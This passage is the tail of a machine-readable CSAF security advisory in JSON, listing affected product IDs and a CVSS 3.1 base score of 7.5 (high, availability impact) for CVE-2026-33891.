"CSAFPID-2914697", "CSAFPID-5187689", "CSAFPID-5222698", "CSAFPID-5940623", "CSAFPID-5940626", "CSAFPID-5940629" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-1439292", "CSAFPID-1439294", "CSAFPID-1439306", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1496261", "CSAFPID-1508257", "CSAFPID-1771999", "CSAFPID-1837472", "CSAFPID-1837473", "CSAFPID-2109952", "CSAFPID-2109953", "CSAFPID-2467441", "CSAFPID-2467442", "CSAFPID-2467443", "CSAFPID-2467444", "CSAFPID-2467445", "CSAFPID-2467448", "CSAFPID-2552001", "CSAFPID-2698055", "CSAFPID-2698057", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2868420", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5187689", "CSAFPID-5197899", "CSAFPID-5222698", "CSAFPID-5733329", "CSAFPID-5920253", "CSAFPID-5940623", "CSAFPID-5940626", "CSAFPID-5940629", "CSAFPID-5956281" ] } ], "title": "CVE-2026-33891" } ] }